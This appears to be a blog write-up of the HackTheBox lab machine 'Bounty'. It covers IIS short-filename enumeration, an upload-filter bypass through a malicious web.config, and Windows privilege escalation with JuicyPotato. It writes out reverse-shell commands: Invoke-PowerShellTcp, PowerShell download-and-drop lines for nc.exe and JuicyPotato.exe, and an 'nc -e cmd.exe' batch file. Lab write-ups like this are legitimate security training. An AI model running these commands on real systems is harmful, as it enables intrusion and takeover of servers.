arrow-left arrow-right brightness-2 chevron-left chevron-right circle-half-full dots-horizontal facebook-box facebook loader magnify menu-down rss-box star twitter-box twitter white-balance-sunny window-close
HackTheBox - Bounty
4 min read

HackTheBox - Bounty

HackTheBox - Bounty


Bounty is an easy to medium difficulty machine, which features a vulnerable ASP.NET instance. I exploited it by bypassing the file uploader to achieve code execution. The machine is also vulnerable to multiple weaknesses and I exploited the SeImpersonatePrivilege to get Administrator shell.


NMAP reveals port 80 that is running in Microsoft IIS httpd 7.5.

Researching about Microsoft IIS httpd 7.5 led us to this scanner created by Soroush Dalili.

latest version of scanners for IIS short filename (8.3) disclosure vulnerability - irsdl/IIS-ShortName-Scanner

Executing the command below will result to the discovery of directories and files information.

java -jar iis_shortname_scanner.jar 2 20 config.xml

As you can see from the result, the name of directories and files are incomplete. So I had to wfuzz them to properly get the exact directory and file names.


There is a file upload in transfer.aspx.

At first, I tried uploading an aspx file but it doesn't seem possible so I tried bypassing it with double extensions but then again failed to make it work.

I then searched for file types managed by ASP.NET and listed all of them below.

File Types Managed by ASP.NET
File Types Managed by ASP.NET. GitHub Gist: instantly share code, notes, and snippets.

I then used Intruder to check which of the file extensions is working.

Now that I learned that we can use .config, I search for config exploit related to IIS httpd 7.5 and found a blog published by Soroush.

The blog explains that we can upload a web.config file that contains a malicious aspx code or VB script. So I copied the content of the config file and modified it by adding a VB script that will download a powershell script.

web.config with vb script
web.config with vb script. GitHub Gist: instantly share code, notes, and snippets.

I copied the Reverse Shell Code from

Invoke-PowerShellTcp -Reverse -IPAddress -Port 1337

I uploaded the web.config file and accessed it in to spawn a shell in my local machine.

Privilege Escalation

Based on the result from systeminfo, the machine is vulnerable to multiple kernel exploits since that no hotfixes have been applied.

I also checked the privileges information of the current user and noticed that the SeImpersonatePrivilege is Enabled. That means we can use JuicyPotato to spawn an Administrator shell.

I uploaded a JuicyPotato using the command below.

iex(new-object net.webclient).downloadfile('', 'C:\users\merlin\appdata\local\temp\JuicyPotato.exe')

I also uploaded a netcat binary for reverse shell connection.

iex(new-object net.webclient).downloadfile('', 'C:\users\merlin\appdata\local\temp\nc.exe')

I created a bat file containing a reverse shell command and uploaded it to the target machine.

echo "C:\Users\merlin\AppData\local\temp\nc.exe 1338 -e cmd.exe" > rev.bat
iex(new-object net.webclient).downloadfile('', 'C:\users\merlin\appdata\local\temp\rev.bat')

Since the target machine is a Microsoft Windows Server 2008 R2, I used the CSLID for the same OS from

I ran the command below and I got a reverse shell back to my local machine.

./JuicyPotato.exe -l 1338 -p rev.bat -t * -c '{e60687f7-01a1-40aa-86ac-db1cbf673334}'